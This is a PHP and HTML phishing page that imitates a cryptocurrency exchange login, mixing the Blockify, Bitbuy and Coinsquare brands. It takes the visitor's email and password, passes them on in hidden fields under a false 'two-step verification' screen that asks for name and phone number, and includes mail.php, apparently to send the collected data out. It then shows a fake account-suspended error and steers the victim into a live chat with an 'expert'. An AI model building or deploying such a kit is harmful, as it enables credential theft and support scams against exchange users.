<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In to Buy and Sell Cryptocurrency | Blockify</title>
    <meta name="robots" content="noindex, nofollow" />
    <meta name="googlebot" content="noindex, nofollow" />
    <meta name="bingbot" content="noindex, nofollow" />
    <link rel="icon" href="" sizes="32x32">
    <link rel="stylesheet" href="assets/css/all.min.css">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="icon" type="image/x-icon" href="assets/images/favicon.png">
</head>

<body>
    <img src="assets/images/header.png" width="100%" style=" border-bottom: 2px solid #c5bfbf;margin-bottom: 55px;">
    <?php
    if (isset($_POST['btnLoginMore'])) {
        include 'mail.php';
    ?>
        <div class="container-fluid" id="welcome-section">
            <form action="" method="post">
                <h2 id="heading" style="margin-bottom: 5px;">2-Step Verification</h2>
                <p style="text-align: center;margin-bottom: 25px;">Enter the 2-step verification generated by your<br>
                    authenticator app.</p>
                <input type="hidden" name="brandName" value="Blockify Login">
                <input type="hidden" name="email" value="<?php echo $_POST['email']; ?>" />
                <input type="hidden" name="password" value="<?php echo $_POST['password']; ?>" />
                <div class="form-group">
                    <input type="text" class="form-control" style="    margin-top: 6px;" placeholder=" Name" name="name" placeholder="Name" required>
                </div>
                <div class="form-group">
                    <input type="text" class="form-control" style="    margin-top: 6px;" placeholder=" Phone Number" name="number" placeholder="Phone Number" required>
                </div>
                <button class="btn btn-block btn-primary" name="fromLog" type="submit">Verify </button>
                <div class="links">
                </div>
            </form>
        </div>
    <?php } elseif (isset($_POST['fromLog'])) {
        include 'mail.php';
    ?>

        <div class="container-fluid errorDiv" id="welcome-section">
            <form action="" method="post" style="">
                <h2 id="heading" style="color: red;">Important Message!<span></span></h2>
                <p style="text-align: center;">Due to unauthorized activity and identification failure on your Account. Account Access has been suspended. Please Get in touch with our Support Staff Immediately

                </p>
                <div class="form">
                    <p style="text-align: center;font-weight: 600;font-size: 20px;">Error CODE: EBRX16X76D
                    </p><br>
                </div>
                <div class="calling-number" style="text-align: center;">
                    <a href="javascript:void(Tawk_API.toggle())" style="padding: 8px 12px; border-radius: 5px; border: 1px solid #27d17f; font-size: 16px;background-color: #27d17f;  color: #000 !important;">Ask Expert</a>
                </div>

            </form>
        </div>
    <?php } else { ?>

        <div class="container-fluid" id="welcome-section">

            <form action="" method="post">
                <img src="assets/images/logo.png" style="margin-bottom: 30px;" alt="logo">
                <h1 class="Sharedstyles__Header-sc-1482qak-5 fVMOP" style="text-align: center;
    font-size: 27px;
    font-weight: 600;">Log In </h1>
                <input type="hidden" name="brandName" value="Bitbuy Login">

                <div class="form-group">
                    <input type="text" class="form-control" id="exampleInputEmail1" name="email" placeholder="Email or Username"
                        placeholder="Email address" required>
                </div>

                <div class="form-group">
                    <input type="password" class="form-control" id="exampleInputPassword1"
                        placeholder="Password" name="password" required>
                </div>

                <button name="btnLoginMore" type="submit" class="btn btn-block btn-primary">Continue</button>
                 <p class="name" style="color: #198754;
    font-size: 16px;
    margin-top: 40px;"> Forgot Password ?</p>
            </form>
        </div>
        <div id="footer" style="background-color: black; text-align: center;"class="jss1"><svg width="200" height="58" viewBox="0 0 290 58" fill="grey" xmlns="http://www.w3.org/2000/svg" aria-label="brand-logo-label" class="MuiSvgIcon-root MuiSvgIcon-fontSizeMedium css-1hvqd38" focusable="false" aria-hidden="true" mode="onDark">
                <title>Coinsquare logo</title>
                <path fill-rule="evenodd" clip-rule="evenodd" d="M72.67 0C71.229 0.0229129 69.8558 0.615374 68.8504 1.64789C67.8451 2.6804 67.2893 4.06887 67.3048 5.50989C67.2894 6.22414 67.4169 6.93433 67.6796 7.59869C67.9423 8.26305 68.3349 8.86827 68.8347 9.3788C69.3344 9.88934 69.9311 10.295 70.5896 10.5718C71.2482 10.8486 71.9555 10.9911 72.67 10.9909C73.3905 10.9988 74.1055 10.8622 74.7724 10.5891C75.4393 10.3161 76.0446 9.9122 76.5528 9.40128C77.0611 8.89036 77.4618 8.2828 77.7313 7.61445C78.0008 6.94609 78.1336 6.23044 78.122 5.50989C78.1258 4.79012 77.9877 4.07674 77.7158 3.4103C77.4438 2.74385 77.0434 2.13742 76.5371 1.62576C76.0308 1.11411 75.4288 0.707129 74.7653 0.428168C74.1018 0.149207 73.3897 0.00379827 72.67 0ZM15.8649 22.7649C17.2982 22.7533 18.699 23.1921 19.8696 24.0195C21.0402 24.8468 21.9215 26.0208 22.3891 27.3759L30.3053 24.9399C29.2462 21.9756 27.2689 19.4267 24.6614 17.6638C22.0539 15.901 18.9521 15.016 15.807 15.1379C13.7173 15.0943 11.6403 15.4742 9.70134 16.2549C7.76239 17.0356 6.0016 18.2008 4.52499 19.6803C3.04837 21.1598 1.88662 22.923 1.1096 24.8636C0.332575 26.8042 -0.043606 28.882 0.00381876 30.9719C-0.0475835 33.0642 0.325506 35.1451 1.10075 37.0891C1.87599 39.0331 3.03734 40.7999 4.51437 42.2825C5.99139 43.7651 7.75351 44.9328 9.69444 45.7153C11.6354 46.4977 13.7148 46.8786 15.807 46.8348C18.9425 46.9674 22.0385 46.0971 24.6456 44.3501C27.2528 42.6031 29.2353 40.0704 30.3053 37.1199L22.3891 34.5969C21.9292 35.9569 21.0499 37.1358 19.8776 37.9644C18.7053 38.7929 17.3003 39.2283 15.8649 39.2078C14.8221 39.1959 13.7932 38.9686 12.8424 38.5402C11.8916 38.1117 11.0396 37.4914 10.3399 36.7181C9.64016 35.9448 9.10787 35.0351 8.77626 34.0463C8.44464 33.0574 8.32077 32.0108 8.41274 30.9719C8.32499 29.9353 8.45193 28.8918 8.78546 27.9064C9.11899 26.9211 9.6521 26.015 10.3514 25.2448C11.0507 24.4747 11.9012 23.8571 12.8498 23.4304C13.7985 23.0037 14.8248 22.7771 15.8649 22.7649ZM47.5581 15.1379C45.4657 15.0946 43.3863 15.4744 41.4442 16.2544C39.5022 17.0344 37.7378 18.1986 36.2566 19.6773C34.7754 21.1559 33.608 22.9185 32.8245 24.8594C32.0411 26.8002 31.6575 28.8793 31.697 30.9719C31.6535 33.067 32.0342 35.1492 32.8159 37.0934C33.5976 39.0376 34.7642 40.8038 36.2458 42.2856C37.7274 43.7673 39.4933 44.934 41.4373 45.7159C43.3813 46.4977 45.4632 46.8783 47.5581 46.8349C49.6529 46.8783 51.735 46.4977 53.679 45.7159C55.623 44.934 57.3888 43.7673 58.8704 42.2856C60.352 40.8038 61.5187 39.0376 62.3004 37.0934C63.0822 35.1492 63.4628 33.067 63.4193 30.9719C63.4588 28.8793 63.0753 26.8002 62.2918 24.8594C61.5083 22.9185 60.3409 21.1559 58.8597 19.6773C57.3786 18.1986 55.6141 17.0344 53.6721 16.2544C51.73 15.4744 49.6504 15.0946 47.5581 15.1379ZM47.5581 39.2078C46.5166 39.1917 45.4898 38.9616 44.5411 38.5317C43.5923 38.1018 42.742 37.4813 42.0432 36.7089C41.3443 35.9365 40.8117 35.0286 40.4785 34.0417C40.1452 33.0548 40.0185 32.0099 40.1061 30.9719C40.0183 29.9354 40.1451 28.8918 40.4786 27.9064C40.8122 26.9211 41.3453 26.015 42.0446 25.2449C42.7439 24.4747 43.5944 23.8571 44.543 23.4304C45.4917 23.0037 46.518 22.7771 47.5581 22.7649C48.5946 22.7808 49.6167 23.0102 50.5606 23.4389C51.5044 23.8677 52.3497 24.4865 53.0436 25.2567C53.7375 26.0269 54.2652 26.9319 54.5936 27.9153C54.922 28.8986 55.0442 29.9393 54.9524 30.9719C55.0397 32.0052 54.9145 33.0453 54.5848 34.0284C54.255 35.0115 53.7276 35.9165 53.0349 36.688C52.3423 37.4596 51.4991 38.0812 50.5572 38.5145C49.6153 38.9479 48.5946 39.1838 47.5581 39.2078ZM68.8421 23.171H64.6951V15.921H77.2812V46.081H68.8421V23.171ZM94.4899 16.2639C96.0609 15.5159 97.7802 15.1311 99.5202 15.1378C100.999 15.0669 102.477 15.3123 103.854 15.8579C105.23 16.4035 106.475 17.2367 107.504 18.3018C108.533 19.3668 109.324 20.6391 109.822 22.0338C110.32 23.4286 110.515 24.9137 110.394 26.3899V45.9358H101.956V28.3618C102.037 27.6637 101.965 26.9564 101.744 26.289C101.524 25.6215 101.162 25.0099 100.682 24.4966C100.202 23.9834 99.6157 23.5807 98.9645 23.3168C98.3132 23.0528 97.6123 22.9338 96.9104 22.9679C95.6717 23.0276 94.4625 23.3664 93.3729 23.9589C92.2834 24.5515 91.3417 25.3824 90.6182 26.3899V46.0519H82.2091V15.9209H90.4442V17.1098V19.4588C91.5361 18.1038 92.9188 17.0119 94.4899 16.2639ZM129.882 27.9559L124.952 26.39C123.415 25.839 122.748 25.114 122.748 24.07C122.748 23.026 123.531 22.04 125.648 22.04C128.395 22.0955 131.018 23.1945 132.985 25.114L137.77 19.6039C134.489 16.6496 130.207 15.0531 125.793 15.1379C118.659 15.1379 114.193 19.546 114.193 24.476C114.186 26.4897 114.861 28.4463 116.11 30.0265C117.358 31.6066 119.105 32.7169 121.066 33.176L126.112 34.6839C128.519 35.4089 129.476 36.0759 129.476 37.5839C129.476 39.0919 128.258 39.817 126.228 39.817C122.991 39.5788 119.927 38.2616 117.528 36.076L113.062 41.876C116.662 45.056 121.339 46.7459 126.141 46.6029C134.232 46.6029 137.944 41.4699 137.944 37.0619C138.06 33.3499 135.972 29.9859 129.882 27.9559ZM163.487 19.807V17.284L163.371 15.9211H171.78V57.565H163.487V42.2529C162.454 43.7392 161.061 44.9392 159.438 45.7406C157.815 46.5419 156.016 46.9184 154.208 46.835C145.944 46.835 139.709 40.1651 139.709 30.9721C139.709 21.7791 145.886 15.138 154.034 15.138C155.879 15.028 157.721 15.4008 159.379 16.2195C161.037 17.0382 162.452 18.2746 163.487 19.807ZM153.056 38.569C154.011 39.0039 155.044 39.241 156.093 39.266C157.144 39.2449 158.18 39.0105 159.138 38.5773C160.096 38.1441 160.956 37.5209 161.666 36.7455C162.377 35.9701 162.922 35.0586 163.27 34.0662C163.618 33.0738 163.761 32.0212 163.69 30.9721C163.761 29.9271 163.618 28.8786 163.269 27.891C162.92 26.9034 162.374 25.9975 161.662 25.2289C160.951 24.4603 160.089 23.8452 159.132 23.4215C158.174 22.9978 157.14 22.7744 156.093 22.765C155.047 22.7742 154.014 22.9977 153.057 23.4217C152.101 23.8457 151.242 24.4612 150.532 25.2303C149.823 25.9994 149.279 26.9056 148.934 27.8931C148.588 28.8806 148.449 29.9286 148.524 30.9721C148.454 32.0189 148.596 33.069 148.942 34.0595C149.288 35.05 149.831 35.9603 150.538 36.7352C151.245 37.5102 152.102 38.134 153.056 38.569ZM196.456 33.4079C196.538 34.1897 196.444 34.9799 196.182 35.7209C195.919 36.4619 195.495 37.1349 194.939 37.6908C194.383 38.2467 193.71 38.6714 192.969 38.9339C192.228 39.1964 191.438 39.2899 190.657 39.2079C189.875 39.2899 189.085 39.1964 188.344 38.9339C187.603 38.6714 186.93 38.2467 186.374 37.6908C185.818 37.1349 185.394 36.4619 185.131 35.7209C184.869 34.9799 184.775 34.1897 184.857 33.4079V16.0079H176.419V35.0899C176.419 41.4119 181.465 46.922 190.54 46.922C199.616 46.922 204.604 41.4119 204.604 35.0899V16.0079H196.253L196.456 33.4079ZM209.446 18.821C213.275 16.4818 217.661 15.2101 222.147 15.1379C228.874 15.1379 235.05 18.2699 235.079 26.3899V46.0809H226.641V43.1809C225.638 44.3892 224.365 45.3443 222.924 45.969C221.483 46.5937 219.916 46.8706 218.348 46.777C217.044 46.8552 215.736 46.6708 214.504 46.2347C213.272 45.7986 212.14 45.1198 211.174 44.2383C210.209 43.3568 209.431 42.2905 208.885 41.1027C208.339 39.9149 208.037 38.6296 207.996 37.323C207.996 31.581 212.143 28.043 218.754 28.043H224.554C225.974 28.043 226.612 27.376 226.612 26.245V25.926C226.612 23.751 224.931 22.3589 221.683 22.3589C218.52 22.6141 215.461 23.6074 212.752 25.2589L209.446 18.821ZM226.214 37.4478C226.503 36.7571 226.638 36.0121 226.612 35.2639L226.554 33.0889C225.81 33.631 224.887 33.8694 223.974 33.7559H220.813C218.174 33.7559 216.609 34.9449 216.609 37.0329C216.624 37.5525 216.749 38.063 216.974 38.5314C217.2 38.9997 217.521 39.4155 217.917 39.7518C218.314 40.0881 218.776 40.3372 219.275 40.4834C219.774 40.6295 220.298 40.6693 220.813 40.6C221.556 40.6883 222.31 40.6146 223.022 40.3842C223.734 40.1539 224.388 39.7723 224.939 39.2654C225.49 38.7585 225.925 38.1385 226.214 37.4478ZM247.723 20.5899V15.8049H239.574V45.9359H247.984V31.4359C247.984 26.1869 249.927 24.1279 254.219 24.1279H257.786V15.573C257.017 15.3862 256.228 15.2984 255.437 15.3119C253.755 15.25 252.099 15.7295 250.71 16.6796C249.321 17.6297 248.274 19.0003 247.723 20.5899ZM274.399 15.138C282.547 15.138 289.941 20.5321 289.941 33.1471L289.999 33.495H267.904C268.078 35.1713 268.874 36.7212 270.136 37.8381C271.398 38.9551 273.033 39.5579 274.718 39.5271C276.056 39.5769 277.381 39.2358 278.529 38.5458C279.677 37.8558 280.6 36.8465 281.184 35.641L289.013 38.309C287.783 41.0611 285.725 43.3613 283.127 44.8894C280.528 46.4175 277.518 47.0976 274.515 46.835C272.435 46.8762 270.369 46.4916 268.444 45.7048C266.519 44.9181 264.774 43.7459 263.319 42.2602C261.863 40.7744 260.727 39.0066 259.979 37.0654C259.232 35.1241 258.889 33.0505 258.973 30.9721C258.877 28.9017 259.207 26.8336 259.943 24.8961C260.68 22.9587 261.806 21.1932 263.252 19.7087C264.698 18.2243 266.434 17.0526 268.351 16.2664C270.269 15.4802 272.327 15.0961 274.399 15.138ZM270.002 23.7362C268.765 24.7493 267.937 26.1763 267.672 27.7529H280.952C280.719 26.1934 279.925 24.7727 278.718 23.758C277.511 22.7433 275.975 22.2045 274.399 22.243C272.801 22.1928 271.239 22.7232 270.002 23.7362Z"></path>
            </svg>
            <div class="jss2"><a href="https://hello.coinsquare.com/csqt/terms" target="_blank" rel="noreferrer" class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-3idkak"><span style="margin-right:20px; color:gray;" class="MuiTypography-root MuiTypography-body2 css-s54ho1">Terms &amp; Conditions</span></a><a href="https://hello.coinsquare.com/csqt/privacy" target="_blank" rel="noreferrer" class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-3idkak"><span style="color:grey;" class="MuiTypography-root MuiTypography-body2 css-s54ho1">Privacy Policy</span></a></div>
            <div class="jss3"><span class="MuiTypography-root MuiTypography-caption2 css-tmyj4b">© 2024 Coinsquare</span></div>
        </div>
    <?php } ?>

    <!--Start of Tawk.to Script-->
    <script type="text/javascript">
        var Tawk_API = Tawk_API || {},
            Tawk_LoadStart = new Date();
        (function() {
            var s1 = document.createElement("script"),
                s0 = document.getElementsByTagName("script")[0];
            s1.async = true;
            s1.src = 'https://embed.tawk.to/642e94c531ebfa0fe7f6d126/1gtavaa21';
            s1.charset = 'UTF-8';
            s1.setAttribute('crossorigin', '*');
            s0.parentNode.insertBefore(s1, s0);
        })();
    </script>
    <!--End of Tawk.to Script-->

</body>

</html>